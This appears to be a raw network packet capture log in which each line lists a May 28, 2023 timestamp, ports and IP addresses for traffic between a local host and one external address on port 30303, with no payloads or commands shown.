May 28, 2023 10:46:23.392999887 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393012047 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393030882 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393038034 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393064022 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393064976 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393090963 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393095016 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393110037 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393119097 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393137932 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393146038 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393162966 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393172026 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393188953 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393198967 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393218994 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393225908 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393244982 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393253088 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393279076 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393281937 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393299103 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393306017 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393332958 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393340111 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393358946 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393366098 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393376112 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393384933 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393404961 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393410921 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393435955 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393439054 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393455029 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393481016 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393484116 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393507004 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393522978 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393533945 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393548965 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393560886 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393577099 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393589020 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393604040 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393615961 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393641949 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393644094 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393665075 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393671036 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393692017 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393698931 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393713951 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393726110 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393743038 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393753052 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393770933 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393779039 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393798113 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393805027 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393824100 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393831968 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393851995 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393860102 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393887043 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393897057 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393906116 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393913031 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393932104 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393939972 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393956900 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393969059 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.393985987 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.393994093 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394012928 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394020081 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394038916 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394047022 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394062996 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394073963 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394097090 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394100904 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394119024 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394128084 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394150972 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394154072 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394179106 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394181013 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394207001 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394212961 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394227982 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394233942 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394252062 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394262075 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394288063 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394298077 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394309998 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394315004 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394337893 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394341946 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394360065 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394371033 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394397020 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394423008 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394423008 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394423008 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394439936 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394452095 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394469023 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394478083 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394504070 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394520998 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394520998 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394531965 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394551039 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394557953 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394577026 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394588947 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394603968 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394617081 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394634962 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394644976 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394660950 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394671917 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394689083 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394699097 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394716978 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394727945 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394746065 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394756079 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394774914 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394782066 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394798040 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394808054 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394825935 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394834995 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394850969 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394862890 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394884109 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394890070 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394907951 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394918919 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394937038 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394944906 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394961119 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394973040 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.394989967 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.394999027 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395019054 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395025969 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395042896 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395055056 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395072937 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395082951 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395100117 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395108938 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395127058 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395137072 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395154953 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395163059 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395180941 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395190954 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395210028 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395216942 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395246983 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395252943 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395273924 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395286083 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395297050 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395306110 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395319939 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395320892 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395340919 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395343065 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395363092 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395371914 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395384073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395395994 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395404100 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395407915 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395426035 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395447016 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395452023 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395452023 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395467997 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395469904 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395489931 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395493984 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395510912 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395529985 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395531893 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395541906 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395553112 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395554066 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395576000 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395576000 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395596981 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395597935 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395618916 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395620108 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395641088 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395641088 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395663023 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395683050 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395689964 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395689964 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395704985 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395711899 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395725965 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395730019 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395747900 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395754099 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395768881 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395770073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395791054 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395792007 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395812035 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395813942 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395834923 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395839930 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395864010 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395865917 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395884991 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395906925 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395911932 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395936012 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395936012 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395941019 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395957947 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.395962954 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395983934 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.395992041 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396006107 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396014929 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396028042 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396044970 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396049023 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396060944 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396070004 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396085024 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396092892 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396109104 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396115065 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396136045 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396140099 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396152973 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396162033 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396176100 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396183968 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396189928 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396204948 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396214008 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396228075 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396234989 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396250010 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396255970 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396281004 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396281958 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396301985 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396301985 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396323919 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396337986 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396344900 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396363974 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396367073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396377087 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396388054 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396403074 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396409035 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396429062 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396436930 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396446943 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396450996 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396456957 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396471977 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396492958 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396495104 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396507025 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396513939 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396531105 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396536112 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396545887 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396558046 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396558046 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396579981 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396584034 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396601915 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396622896 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396634102 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396634102 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396644115 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396655083 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396666050 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396677971 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396687984 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396707058 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396709919 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396719933 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396730900 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396732092 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396753073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396764040 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396774054 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396784067 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396795034 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396807909 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396816015 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396836042 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396836996 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396851063 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396859884 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396862984 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396883011 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396889925 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396904945 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396917105 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396927118 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396935940 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396948099 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396959066 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396970034 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.396987915 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.396990061 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397002935 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397013903 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397015095 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397034883 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397042990 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397056103 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397067070 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397077084 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397098064 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397099018 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397114038 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397120953 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397140980 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397144079 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397156954 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397162914 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397172928 CEST	49685	30303	192.168.2.3	188.34.154.187
